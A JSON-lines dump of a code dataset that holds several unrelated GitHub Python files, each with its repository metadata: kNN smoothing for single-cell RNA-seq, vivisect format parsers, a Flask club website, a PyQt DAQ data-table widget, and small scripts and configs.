\"\"\"\n # median-normalize\n tmatrix = _median_normalize(matrix)\n # Freeman-Tukey transform\n tmatrix = _freeman_tukey_transform(tmatrix)\n pca = PCA(n_components=d, svd_solver='arpack', random_state=seed)\n t0 = time.time()\n tmatrix = pca.fit_transform(tmatrix)\n t1 = time.time()\n var_explained = np.cumsum(pca.explained_variance_ratio_)[-1]\n if verbose:\n print('\\tPCA took %.1f s.' % (t1-t0))\n print('\\tThe fraction of variance explained by the top %d PCs is %.1f %%.'\n % (d, 100*var_explained))\n\n return tmatrix\n\n\ndef _calculate_pairwise_distances(X, num_jobs=1):\n \"\"\"Calculates the distances between all cells in X.\n \n Parameters\n -----\n X: numpy.ndarray\n A n-by-d matrix containing the coordinates of n cells in d-dimensional\n space.\n \n Returns\n -------\n numpy.ndarray\n A n-by-n matrix containing the pairwise distances between all cells.\n \n Notes\n -----\n This uses the Euclidean metric.\n \"\"\"\n D = pairwise_distances(X, n_jobs=num_jobs, metric='euclidean')\n return D\n\n\ndef knn_smoothing(X, k, d=10, dither=0.03, seed=0, verbose=False):\n \"\"\"K-nearest neighbor smoothing for UMI-filtered single-cell RNA-Seq data.\n \n This function implements an improved version of the kNN-smoothing 2\n algorithm by Wagner et al.\n (https://www.biorxiv.org/content/early/2018/04/09/217737).\n \n Parameters\n ----------\n X : numpy.ndarray\n A n-by-p expression matrix containing UMI counts for n cells and p\n genes. Must contain floating point values, i.e. 
dtype=np.float64.\n k : int\n The number of neighbors to use for smoothing.\n d : int, optional\n The number of principal components to use for identifying neighbors.\n Default: 10.\n dither : float, optional\n Amount of dither to apply to the partially smoothed and PCA-transformed\n data in each step. Specified as the fraction of the range of the\n cell scores for each PC. Default: 0.03.\n seed : int, optional\n The seed for initializing the pseudo-random number generator used by\n the randomized PCA algorithm. This usually does not need to be changed.\n Default: 0.\n verbose : bool, optional\n If True, print progress information. Default: False.\n \n Returns\n -------\n numpy.ndarray\n A n-by-p expression matrix containing the smoothed expression values.\n The matrix is not normalized. Therefore, even though efficiency noise\n is usually dampened by the smoothing, median-normalization of the\n smoothed matrix is recommended.\n \n Raises\n ------\n ValueError\n If X does not contain floating point values.\n If k is invalid (k < 1 or k > n).\n If d is invalid (d < 1 or d > # principal components).\n \"\"\"\n np.random.seed(seed)\n\n if not (X.dtype == np.float64 or X.dtype == np.float32):\n raise ValueError('X must contain floating point values! Try X = np.float64(X).')\n\n n, p = X.shape\n num_pcs = min(p, n-1) # the number of principal components\n\n if k < 1 or k > n:\n raise ValueError('k must be between 1 and %d.' % n)\n if d < 1 or d > num_pcs:\n raise ValueError('d must be between 1 and %d.' % num_pcs)\n\n if verbose:\n print('Performing kNN-smoothing v2.1 with k=%d, d=%d, and dither=%.3f...' % (k, d, dither))\n\n t0_total = time.time()\n\n if k == 1:\n num_steps = 0\n else:\n num_steps = ceil(log(k)/log(2))\n \n S = X.copy()\n \n for t in range(1, num_steps+1):\n k_step = min(pow(2, t), k)\n if verbose:\n print('Step %d/%d: Smooth using k=%d' % (t, num_steps, k_step))\n \n Y = _calculate_pc_scores(S, d, seed=seed, verbose=verbose)\n if dither > 0:\n for l in range(d):\n ptp = np.ptp(Y[:, l])\n dy = (np.random.rand(Y.shape[0])-0.5)*ptp*dither\n Y[:, l] = Y[:, l] + dy\n\n # determine cell-cell distances using smoothed matrix\n t0 = time.time()\n D = _calculate_pairwise_distances(Y)\n t1 = time.time()\n if verbose:\n print('\\tCalculating pair-wise distance matrix took %.1f s.' % (t1-t0))\n \n t0 = time.time()\n A = np.argsort(D, axis=1, kind='mergesort')\n t1 = time.time()\n if verbose:\n print('\\tRunning argsort took %.1f s.' % (t1-t0))\n \n t0 = time.time()\n for j in range(X.shape[0]):\n ind = A[j, :k_step]\n S[j, :] = np.sum(X[ind, :], axis=0)\n t1 = time.time()\n if verbose:\n print('\\tCalculating the smoothed expression matrix took %.1f s.' % (t1-t0))\n\n t1_total = time.time()\n if verbose:\n print('kNN-smoothing finished in %.1f s.' % (t1_total-t0_total))\n\n return S\n\n\ndef knn_smooth_adata(\n adata,\n groupby=['donor'],\n k=16,\n n_components=20,\n dither=0.03,\n random_state=42,\n):\n \"\"\"Wrapper for kNN-smoothing for use with AnnData objects.\n \n Parameters\n ----------\n adata : AnnData\n An AnnData object containing the expression matrix in adata.X.\n groupby : str or list of str, optional\n The key(s) of the observations grouping to consider. Default: ['donor'].\n k : int, optional\n The number of neighbors to use for smoothing. 
Default: 16.\n n_components : int, optional\n The number of principal components to use for identifying neighbors.\n Default: 20.\n dither : float, optional\n Amount of dither to apply to the partially smoothed and PCA-transformed\n data in each step. Specified as the fraction of the range of the\n cell scores for each PC. Default: 0.03.\n random_state : int, optional\n The seed for initializing the pseudo-random number generator used by\n the randomized PCA algorithm. This usually does not need to be changed.\n Default: 42.\n\n Returns\n -------\n AnnData\n An AnnData object containing the smoothed expression matrix in adata.X.\n \"\"\"\n adatas = []\n for _, subset_df in adata.obs.groupby(groupby):\n adata_sub = adata[subset_df.index, :].copy()\n sc.pp.filter_genes(adata_sub, min_cells=1)\n sc.pp.filter_cells(adata_sub, min_genes=1)\n S = knn_smoothing(adata_sub.X.toarray(), k=k, d=n_components, dither=dither, seed=random_state)\n adata_sub.X = csr_matrix(S)\n adatas.append(adata_sub)\n adata_knn = sc.concat(adatas, join='outer', merge='first')\n return adata_knn\n\n\n# if __name__ == '__main__':\n# import scanpy as sc\n# import cellrank as cr\n\n# adata = cr.datasets.reprogramming_schiebinger()\n# sc.pp.subsample(adata, fraction=0.1)\n# sc.pp.filter_genes(adata, min_cells=10)\n# sc.pp.filter_cells(adata, min_genes=100)\n# S = knn_smoothing(adata.X.toarray(), k=2, d=10, dither=0, seed=42, verbose=True)","repo_name":"ricomnl/biolib","sub_path":"biolib/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":9807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3267578854","text":"\"\"\"\nThe vivisect.parsers package contains all the known file format parsers\nfor vivisect. Each parser module must implement the following functions:\n\n parseFile(workspace, filename):\n Load the file into the given workspace\n parseBytes(workspace, bytes):\n Load the file (pre-read in) into the workspace\n\n\"\"\"\n# Some parser utilities\n\nimport sys\nimport struct\nimport hashlib\n\nimport vstruct.defs.macho as vs_macho\n\n\ndef md5File(filename: str):\n d = hashlib.md5()\n with open(filename, \"rb\") as f:\n bytes = f.read(4096)\n while len(bytes):\n d.update(bytes)\n bytes = f.read(4096)\n return d.hexdigest()\n\n\ndef md5Bytes(bytes):\n d = hashlib.md5()\n d.update(bytes)\n return d.hexdigest()\n\n\nmacho_magics = (\n vs_macho.MH_MAGIC,\n vs_macho.MH_CIGAM,\n vs_macho.MH_MAGIC_64,\n vs_macho.MH_CIGAM_64,\n vs_macho.FAT_MAGIC,\n vs_macho.FAT_CIGAM,\n)\n\n\ndef guessFormat(bytes):\n if bytes.startswith(b'VIV'):\n return 'viv'\n\n if bytes.startswith(b\"MZ\"):\n return 'pe'\n\n if bytes.startswith(b\"\\x7fELF\"):\n return 'elf'\n\n if bytes.startswith(b\"\\x7fCGC\"):\n return 'cgc'\n\n bytemagic = struct.unpack(' distance_to_san else min_distance\n\n return min_distance\n\n\n return get_min_distance_to_san('YOU', 0) - 2\n\n\nprint('Part 1: ', part1())\nprint('Part 2: ', part2())\n","repo_name":"victorkirov/aoc","sub_path":"2019/6/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29476496271","text":"import torch\n\nfrom .base import *\nimport data.constants as dconstants\nfrom .uncertainty_quantification import OODSeparation\nimport evaluation.callbacks\nfrom evaluation.util import run_model_on_datasets, get_data_loader\nfrom evaluation.logging import *\n\n@register_pipeline_member\nclass 
EvaluateAccuracy(OODSeparation):\n \"\"\" Pipeline member to evaluate the accuracy of the model on a dataset. Note: The dataset should follow the train labels. \"\"\"\n\n name = 'EvaluateAccuracy'\n\n def __init__(self, evaluate_on=[dconstants.OOD_VAL], gpus=0, **kwargs):\n super().__init__(evaluate_on=evaluate_on, **kwargs)\n self.gpus = gpus\n\n @property\n def configuration(self):\n return super().configuration\n \n @torch.no_grad()\n def __call__(self, *args, **kwargs):\n \n cfg: configuration.ExperimentConfiguration = kwargs['config']\n predictions, labels, mask = run_model_on_datasets(\n kwargs['model'], [get_data_loader(name, kwargs['data_loaders']) for name in self.evaluate_on], \n gpus=self.gpus, model_kwargs=self.model_kwargs_evaluate,\n callbacks = [\n evaluation.callbacks.make_callback_get_predictions(),\n evaluation.callbacks.make_callback_get_ground_truth(),\n evaluation.callbacks.make_callback_is_ground_truth_in_labels(\n cfg.data.train_labels),\n\n ])\n mask, predictions, labels = torch.cat(mask, dim=0), torch.cat(predictions, dim=0), torch.cat(labels)\n is_id, is_id_mask, _, _ = self.get_ood_distribution_labels(**kwargs)\n\n # Accuracy should only be computed for classes the model can actually predict\n predictions, labels, is_id_mask, is_id = predictions[mask], labels[mask], is_id_mask[mask], is_id[mask]\n\n _, hard = predictions.max(dim=-1)\n acc = (hard == labels).float().mean()\n acc_id = (hard == labels)[(is_id == 1) & is_id_mask].float().mean()\n acc_ood = (hard == labels)[(is_id == 0) & is_id_mask].float().mean()\n\n dataset_names = '-'.join(self.evaluate_on)\n kwargs['metrics'][f'accuracy_{dataset_names}{self.suffix}'] = acc.item()\n kwargs['metrics'][f'accuracy_id_{dataset_names}{self.suffix}'] = acc_id.item()\n kwargs['metrics'][f'accuracy_ood_{dataset_names}{self.suffix}'] = acc_ood.item()\n pipeline_log(f'Evaluated accuracy for {self.evaluate_on}.')\n\n return args, kwargs\n\n","repo_name":"dfuchsgruber/MasterThesis","sub_path":"evaluation/pipeline/accuracy.py","file_name":"accuracy.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6239969613","text":"from django.urls import path\nfrom .views import homeview,tajikabad,ms,jinnah,ms_heights,aboutus,latest_project,posts,sig_post,contact_us\nfrom django.conf import settings # new\nfrom django.conf.urls.static import static # new\n\nurlpatterns = [\n path('', homeview, name='homepage'),\n path('aghajee-apart', tajikabad, name='tj'),\n path('jinnah-apartment', jinnah, name='jin'),\n path('Aghajee-malik-saleem ', ms, name='ms'),\n path('Aghajee-malik-saleem-height ', ms_heights, name='msh'),\n path('latest-projects ', latest_project, name='lstt'),\n path('about-us', aboutus, name='abt'),\n path('contact-us', contact_us, name='cont-us'),\n path('blog', posts , name='psts'),\n path('', sig_post, name='sigpst'),\n\n]\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"iffikhan1717/brandnew","sub_path":"website/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15455016529","text":"import FWCore.ParameterSet.Config as cms\n\nimport os\n\nprocess = cms.PSet()\n\nprocess.fwliteInput = cms.PSet(\n fileNames = cms.vstring(),\n \n maxEvents = cms.int32(-1),\n \n outputEvery = cms.uint32(100000)\n)\n\nprocess.fwliteInput.fileNames = 
cms.vstring(\n 'reweightTreeAntiElectronDiscrMVA_signal.root',\n 'reweightTreeAntiElectronDiscrMVA_background.root'\n)\n\nprocess.trainTauIdMVA = cms.PSet(\n\n treeName = cms.string('reweightedAntiElectronDiscrMVATrainingNtuple'),\n\n signalSamples = cms.vstring('signal'),\n backgroundSamples = cms.vstring('background'),\n\n applyPtReweighting = cms.bool(True),\n applyEtaReweighting = cms.bool(True),\n reweight = cms.string(\"flat\"),\n \n branchNameEvtWeight = cms.string('evtWeight'),\n\n applyEventPruning = cms.int32(0),\n\n mvaName = cms.string(\"mvaAntiElectronDiscr\"),\n mvaMethodType = cms.string(\"BDT\"),\n mvaMethodName = cms.string(\"BDTG\"),\n mvaTrainingOptions = cms.string(\n \"!H:!V:NTrees=600:BoostType=Grad:Shrinkage=0.30:UseBaggedGrad:GradBaggingFraction=0.6:SeparationType=GiniIndex:nCuts=20:PruneMethod=CostComplexity:PruneStrength=50:NNodesMax=5\"\n ),\n inputVariables = cms.vstring(\n\n ),\n spectatorVariables = cms.vstring(\n 'Tau_Pt/F',\n 'Tau_Eta/F',\n 'Tau_DecayMode/F',\n 'Tau_LeadHadronPt/F',\n 'Tau_LooseComb3HitsIso/F',\n 'NumPV/I' \n ),\n\n outputFileName = cms.string('trainAntiElectronDiscrMVA.root')\n)\n","repo_name":"cms-tau-pog/TauAnalysisTools","sub_path":"TauAnalysisTools/test/trainAntiElectronDiscrMVA_cfg.py","file_name":"trainAntiElectronDiscrMVA_cfg.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"14722666784","text":"\"\"\"Netstring encoder / decoder module\r\n\r\nEncodes and decodes netstring streams, or files.\"\"\"\r\n\r\nclassifiers = \"\"\"\\\r\nDevelopment Status :: 5 - Production/Stable\r\nIntended Audience :: Developers\r\nProgramming Language :: Python\r\nLicense :: Public Domain\r\nOperating System :: OS Independent\r\nTopic :: Internet\r\n\"\"\"\r\n\r\nfrom distutils.core import setup\r\nfrom netstring import __version__\r\n\r\ndoclines = __doc__.split(\"\\n\")\r\n\r\nsetup( name='netstring',\r\n version = __version__, \r\n author = 'Will McGugan',\r\n author_email = 'will@willmcgugan.com',\r\n license = \"public domain\",\r\n url = 'http://code.google.com/p/netstring/',\r\n download_url = 'http://code.google.com/p/netstring/downloads/list',\r\n platforms = ['any'],\r\n description = doclines[0],\r\n long_description = '\\n'.join(doclines[2:]),\r\n py_modules = ['netstring'],\r\n classifiers = classifiers.splitlines(),\r\n )\r\n","repo_name":"willmcgugan/netstring","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"1643426730","text":"\nimport pandas\nimport numpy as np\nfrom sklearn import tree\n\n'''\nNote:\nThis is a poor way of going about making predictions. While the accuracy is somewhere around 70%,\nthis model takes too many variables into account. 
A better implementation of this would use the logistic\nregression model from the original competition to choose which variables to use and then use sklearn to\ncreate a model that only uses the variables with the highest correlation to attrition status.\n'''\n\ndf = pandas.read_csv('cleaned_data.csv')\n\nprint(df.dtypes)\nprint(df.head())\n\nx_values = df.iloc[:, 4:].values # select the feature columns (df[4:] would slice rows, not columns)\nprint(x_values)\n\ny_values = df['AttritionStatus'].values\nprint(y_values)\n\nclassifier = tree.DecisionTreeClassifier()\nclassifier = classifier.fit(x_values[:750], y_values[:750]) # use the first 3/4 of the data for training\n\npredictions = classifier.predict(x_values[750:])\n\ncorrect = 0\nfor i,p in enumerate(predictions):\n\t#print('Prediction:', p, 'Actual:', y_values[750+i], '[Correct]' if p == y_values[750+i] else '')\n\tcorrect += 1 if p == y_values[750+i] else 0\n\nprint('Accuracy:', correct/250)","repo_name":"brett-dun/Undergraduate-Data-Analytics-Competition-2019-Revisited","sub_path":"tree_classification.py","file_name":"tree_classification.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35527597625","text":"# Import Flask and render_template (the function used to render HTML)\nfrom flask import Flask,render_template,request,redirect,url_for,send_from_directory,session\nfrom app.models.models import Member\nfrom app.models.models import News\nfrom app.models.database import db_session\nfrom datetime import datetime\nfrom werkzeug.utils import secure_filename\nfrom app import key \nimport os\n# Create the Flask object\napp = Flask(__name__)\napp.secret_key = key.getSessionKey()\n\n### Basic pages\n@app.route(\"/top\")\ndef top():\n return render_template(\"top.html\")\n\n@app.route(\"/member\")\ndef member():\n all_member = Member.query.all()\n return render_template(\"member.html\",all_member=all_member)\n\n@app.route(\"/news\")\ndef news():\n all_news = News.query.all()\n all_news = sorted(all_news, key=lambda u: u.date,reverse=True)\n return render_template(\"news.html\",all_news=all_news)\n\n@app.route(\"/contact\")\ndef contact():\n return render_template(\"contact.html\")\n\n@app.route(\"/twitter\")\ndef twitter():\n return render_template(\"twitter.html\")\n\n### Admin login\n\n@app.route(\"/admin\", methods = [\"get\"])\ndef admin():\n return render_template(\"admin.html\")\n\n@app.route(\"/admin\",methods=[\"post\"])\ndef login():\n password = request.form[\"password\"]\n if password == key.getAdminKey():\n session[\"admin\"] = \"admin\"\n return redirect(\"/edit\")\n else:\n return render_template(\"admin.html\",alert=\"Not correct pass\")\n\n@app.route(\"/logout\")\ndef logout():\n session.pop(\"admin\", None)\n return redirect(\"/admin\")\n\n\n### Admin operations\n\n@app.route(\"/edit\")\ndef edit():\n if \"admin\" in session:\n all_member = Member.query.all()\n all_news = News.query.all()\n return render_template(\"edit.html\", all_member=all_member, all_news=all_news)\n else :\n return redirect(\"/admin\")\n## File upload\nUPLOAD_FOLDER = './app/static/member_images'\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n@app.route(\"/member_add\",methods =[\"post\"])\ndef member_add():\n name = request.form[\"name\"]\n img_file = request.files['member_image']\n twitter = request.form[\"twitter\"]\n content = Member(name,twitter)\n db_session.add(content)\n db_session.commit()\n member = Member.query.filter_by(name=name).first()\n filename = str(member.id)+\".png\"\n img_file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n return 
redirect(\"/edit\")\n\n\n@app.route(\"/member_del\", methods =[\"post\"])\ndef member_del():\n id_list = request.form.getlist(\"del\")\n for id in id_list:\n content = Member.query.filter_by(id=id).first()\n db_session.delete(content)\n db_session.commit()\n return redirect(\"/edit\")\n\n@app.route(\"/news_add\", methods =[\"post\"])\ndef news_add():\n date = request.form[\"date\"]\n text = request.form[\"text\"]\n content = News(date,text)\n db_session.add(content)\n db_session.commit()\n return redirect(\"/edit\")\n\n\n@app.route(\"/news_del\", methods =[\"post\"])\ndef news_del():\n id_list = request.form.getlist(\"del\")\n for id in id_list:\n content = News.query.filter_by(id=id).first()\n db_session.delete(content)\n db_session.commit()\n return redirect(\"/edit\")\n\n\n# Boilerplate: run the development server when executed directly\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n ","repo_name":"teruto725/hopers","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4900126495","text":"from abc import abstractmethod\nfrom datetime import datetime\nfrom typing import TypeVar\n\nfrom ..extensions import db_wrapper as db\n\nB = TypeVar('B', bound='BaseModel')\n\n\nclass Base(db.Model):\n class Meta:\n database = db.database\n\n @abstractmethod\n def save(self, *args: list, **kwargs: dict) -> int:\n if hasattr(self, 'created_at') and hasattr(self, 'deleted_at'):\n current_date = datetime.utcnow()\n\n if self.id is None and self.created_at is None:\n self.created_at = current_date\n\n if self.deleted_at is None:\n self.updated_at = current_date\n\n return super(Base, self).save(*args, **kwargs)\n\n @classmethod\n def get_fields(cls, exclude: list = None, include: list = None,\n sort_order: list = None) -> set:\n exclude = exclude or []\n include = include or []\n sort_order = sort_order or []\n\n fields = set(filter(\n lambda x: x not in exclude,\n list(cls._meta.fields)\n ))\n\n if include:\n fields = set(filter(\n lambda x: x in include,\n list(cls._meta.fields)\n ))\n\n if sort_order and len(fields) == len(sort_order):\n fields = sorted(fields, key=lambda x: sort_order.index(x))\n\n return fields\n\n @staticmethod\n def raw(query: str):\n return db.database.execute_sql(query)\n\n def reload(self):\n return type(self).get(self._pk_expr())\n","repo_name":"Rubenrod18/flask_api","sub_path":"app/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"44735507974","text":"\r\n\r\nfrom __future__ import print_function\r\n\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\n\r\nfrom math import *\r\n\r\nimport globals, daqIO, variable\r\n\r\nclass DaqItemDelegate(QtWidgets.QStyledItemDelegate):\r\n \r\n parent = None\r\n dataModel = None\r\n bIsAdaptiveTimeUnit = True\r\n\r\n def __init__(self, parent, dataModel):\r\n QtWidgets.QStyledItemDelegate.__init__(self, parent)\r\n self.parent = parent\r\n self.dataModel = dataModel\r\n\r\n def setAdaptiveTimeUnit(self, bIsAdaptiveTimeUnit):\r\n self.bIsAdaptiveTimeUnit = bIsAdaptiveTimeUnit\r\n\r\n def getTimeUnit(self, dTime):\r\n aUnits = ['s', 'ms', 'us', 'ns']\r\n nUnit = 0\r\n if (dTime >= 0):\r\n while (dTime < 1 and nUnit + 1 < len(aUnits)):\r\n dTime *= 1000\r\n nUnit += 1\r\n return dTime, aUnits[nUnit]\r\n\r\n def paint(self, painter, option, index):\r\n if index.column() == 0:\r\n color = QtGui.QColor(0, 0, 0, 255)\r\n 
else:\r\n varIdx = self.dataModel.enabledVars[index.column()-1]\r\n var = self.parent.daqIdeaConfig.variableConfigs[varIdx]\r\n daqIdx = var.daqConfigIndex\r\n \r\n realValue = self.parent.daqManager.isRealValue(index.row(), daqIdx)\r\n \r\n if realValue:\r\n color = QtGui.QColor(0, 0, 0, 255)\r\n else:\r\n color = QtGui.QColor(0, 0, 0, 127)\r\n \r\n option.palette.setColor(QtGui.QPalette.Text, color)\r\n \r\n if index.column() == 0:\r\n strTime = None\r\n dTime = self.dataModel.getData(index.row(), index.column())\r\n if self.bIsAdaptiveTimeUnit:\r\n strUnit = None\r\n dTime, strUnit = self.getTimeUnit(dTime)\r\n strTime = \"{:.4f} {}\".format(dTime, strUnit)\r\n else:\r\n strTime = \"{:10.6f}\".format(dTime)\r\n\r\n option.rect.setWidth(option.rect.width() - 3)\r\n painter.drawText(option.rect, QtCore.Qt.AlignRight | QtCore.Qt.AlignCenter, strTime);\r\n else:\r\n return QtWidgets.QStyledItemDelegate.paint(self, painter, option, index)\r\n \r\n \r\nclass DaqTableModel(QtCore.QAbstractTableModel):\r\n \r\n parent = None\r\n enabledVars = []\r\n dataModelFull = True\r\n strTimeUnit = None\r\n\r\n def __init__(self, parent, daqCfg, *args):\r\n QtCore.QAbstractTableModel.__init__(self, parent, *args)\r\n self.parent = parent\r\n\r\n def rowCount(self, parent):\r\n return self.getRowCount() \r\n \r\n def getRowCount(self):\r\n return len(self.parent.daqManager.allTimePoints)\r\n \r\n def columnCount(self, parent):\r\n return self.getColumnCount()\r\n \r\n def getColumnCount(self):\r\n return len(self.enabledVars) + 1\r\n\r\n def data(self, index, role):\r\n if (self.parent.daqManager.wasConfigured and \r\n index.isValid() and \r\n role == QtCore.Qt.DisplayRole):\r\n\r\n r = index.row()\r\n c = index.column()\r\n\r\n return self.getData(r, c)\r\n else:\r\n return None\r\n \r\n def getData(self, r, c):\r\n if (c == 0):\r\n return self.parent.daqManager.allTimePoints[r]\r\n else:\r\n varIdx = self.enabledVars[c-1]\r\n var = self.parent.daqIdeaConfig.variableConfigs[varIdx]\r\n daqIdx = var.daqConfigIndex\r\n \r\n if (daqIdx >= 0):\r\n daq = self.parent.daqManager\r\n \r\n varType = self.parent.daqManager.getVariableByName(var.name)\r\n if varType == None:\r\n return 'N/A'\r\n \r\n if (not self.dataModelFull) and (not daq.isRealValue(r, daqIdx)):\r\n return ''\r\n \r\n if (varType != None and \r\n varType.simpleType == variable.TYPE_IO and \r\n varType.portType == daqIO.HIL_AIN):\r\n \r\n formater = '{0:f}'\r\n return formater.format(daq.getEstimatedValue(r, daqIdx))\r\n else:\r\n formater = globals.formatterStrings[var.format]\r\n return formater.format(daq.getEstimatedValue(r, daqIdx))\r\n else:\r\n return 'N/A'\r\n \r\n \r\n def headerData(self, idx, orientation, role):\r\n if role == QtCore.Qt.DisplayRole:\r\n if orientation == QtCore.Qt.Horizontal:\r\n return self.getHorizontalHeaderName(idx)\r\n elif orientation == QtCore.Qt.Vertical:\r\n return self.getVerticalHeaderName(idx)\r\n else:\r\n return None\r\n \r\n def setTimeUnit(self, strUnit):\r\n self.strTimeUnit = strUnit\r\n\r\n def getHorizontalHeaderName(self, column):\r\n if column == 0:\r\n strColumn = 'Time'\r\n if None != self.strTimeUnit:\r\n strColumn = 'Time [{}]'.format(self.strTimeUnit)\r\n return strColumn\r\n else:\r\n varIdx = self.enabledVars[column-1]\r\n return self.parent.daqIdeaConfig.variableConfigs[varIdx].name\r\n \r\n def getVerticalHeaderName(self, row):\r\n return row + 1\r\n \r\n def isRealValue(self, row, column):\r\n if (column == 0):\r\n return True\r\n else:\r\n varIdx = self.enabledVars[column-1]\r\n var = 
self.parent.daqIdeaConfig.variableConfigs[varIdx]\r\n daqIdx = var.daqConfigIndex\r\n \r\n if (daqIdx >= 0):\r\n return self.parent.daqManager.isRealValue(row, daqIdx)\r\n else:\r\n return 'N/A'\r\n\r\n def setDataModelEstimation(self, full):\r\n self.dataModelFull = full\r\n\r\n # If the DAQ was reconfigured then we should call this\r\n def updateDataModel(self):\r\n # Checks which variables are used (excluding the disabled ones)\r\n newVars = []\r\n for idx, var in enumerate(self.parent.daqIdeaConfig.variableConfigs):\r\n if var.enabled:\r\n newVars.append(idx)\r\n \r\n self.beginResetModel()\r\n self.enabledVars = newVars\r\n self.endResetModel()\r\n \r\n self.updateFormatting()\r\n\r\n \r\n def updateFormatting(self):\r\n rc = len(self.parent.daqManager.allTimePoints)\r\n \r\n if (rc > 0): \r\n for rowIdx, varConfig in enumerate(self.parent.daqIdeaConfig.variableConfigs):\r\n self.beginRemoveRows(QtCore.QModelIndex(), 0, rc-1)\r\n self.endRemoveRows()\r\n\r\n self.beginInsertRows(QtCore.QModelIndex(), 0, rc-1);\r\n self.endInsertRows()\r\n \r\n\r\nclass VariableChooserCombo(QtWidgets.QComboBox):\r\n \r\n parent = None\r\n variables = []\r\n allFullNames = None\r\n completer = None\r\n lastText = None\r\n \r\n selectedVariable = None\r\n variableConfig = None\r\n \r\n itemsSet = None\r\n \r\n comboDeleted = False\r\n \r\n def __init__(self, p, varCfg):\r\n QtWidgets.QComboBox.__init__(self, p)\r\n self.parent = p\r\n self.variableConfig = varCfg\r\n self.itemsSet = False\r\n \r\n def setVariables(self, vars):\r\n self.variables = vars\r\n self.allFullNames = []\r\n \r\n for var in self.variables:\r\n self.allFullNames.append(var.fullName)\r\n \r\n self.allFullNames = sorted(self.allFullNames)\r\n \r\n self.clear()\r\n self.addItems(self.allFullNames)\r\n self.setEditable(True)\r\n \r\n self.completer = QtWidgets.QCompleter(self.allFullNames, self.parent)\r\n self.completer.setCaseSensitivity(QtCore.Qt.CaseSensitive)\r\n self.completer.setModelSorting(QtWidgets.QCompleter.CaseSensitivelySortedModel)\r\n self.completer.setCompletionMode(QtWidgets.QCompleter.PopupCompletion)\r\n \r\n self.completer.setMaxVisibleItems(20)\r\n \r\n self.setCompleter(self.completer)\r\n\r\n \r\n # variables with complexity of *name[3][4] \r\n #rx = QtCore.QRegExp(\"\\*?[A-Za-z_][A-Za-z0-9_]*((\\[\\d{1,4}\\])|(\\[\\]))*\")\r\n \r\n '''\r\n rx = QtCore.QRegExp(\"(([A-Za-z_]\" + # var start char\r\n \"[A-Za-z0-9_]*\" + # rest of chars\r\n \"(\\[\\d{0,4}\\])*)\" + # array indices\r\n \"(,,[A-Za-z0-9_\\-\\.\\\\ ]+))|\" +\r\n \"(0x[0-9a-fA-F]{0,8})\" # or just plain hex memory address\r\n )\r\n \r\n v = QtGui.QRegExpValidator(rx)\r\n self.setValidator(v)\r\n ''' \r\n self.itemsSet = True\r\n \r\n # New config\r\n if (len(self.variableConfig.name) <= 0):\r\n self.setCurrentIndex(0)\r\n \r\n self.parent.setVariableValidityStatus('black', 'Please select variable name for each row inside of variable table!')\r\n else:\r\n self.setEditText(self.variableConfig.name)\r\n \r\n \r\n def event(self, event):\r\n QtWidgets.QComboBox.event(self, event)\r\n \r\n if self.comboDeleted:\r\n return True\r\n \r\n if (not self.itemsSet):\r\n return True\r\n \r\n old = str(self.lastText)\r\n new = str(self.currentText())\r\n \r\n if (old != new):\r\n self.lastText = new\r\n self.variableConfig.name = new\r\n \r\n \r\n oldVar = self.variableConfig.variable\r\n try:\r\n newVar = self.parent.daqManager.getVariableByName(new)\r\n except:\r\n newVar = None\r\n \r\n if (newVar != None and \r\n newVar != oldVar):\r\n 
self.variableConfig.variable = newVar\r\n \r\n if (oldVar == None or\r\n newVar.formatters != oldVar.formatters):\r\n self.variableConfig.updateFormatterComboBox()\r\n \r\n self.parent.checkAllVariablesValidity()\r\n \r\n return True\r\n \r\n \r\n def removing(self):\r\n self.comboDeleted = True\r\n\r\n \r\n # Count how many first characters are equal in both strings\r\n def countCharMatch(self, s1, s2):\r\n c = min(len(s1), len(s2))\r\n res = 0;\r\n for i in range(0, c):\r\n if (s1[res] == s2[res]):\r\n res += 1\r\n \r\n return res\r\n\r\n\r\n\r\nclass DeleteButton(QtWidgets.QPushButton):\r\n \r\n myParent = None\r\n varConfig = None\r\n\r\n def __init__(self, parent, varCfg):\r\n QtWidgets.QPushButton.__init__(self)\r\n self.myParent = parent\r\n self.varConfig = varCfg\r\n self.clicked.connect(self.deleteButtonClick)\r\n\r\n def deleteButtonClick(self):\r\n # find the button that called this delete event\r\n configs = self.myParent.daqIdeaConfig.variableConfigs\r\n varIdx = configs.index(self.varConfig)\r\n\r\n if (varIdx >= 0):\r\n configs.pop(varIdx)\r\n \r\n self.myParent.variableTable.cellWidget(varIdx, globals.TABLE_COLUMN_NAME).removing()\r\n self.myParent.variableTable.removeRow(varIdx)\r\n self.myParent.canvasGraph.updateChartSubplots()\r\n self.myParent.checkAllVariablesValidity()\r\n \r\n\r\n\r\nclass 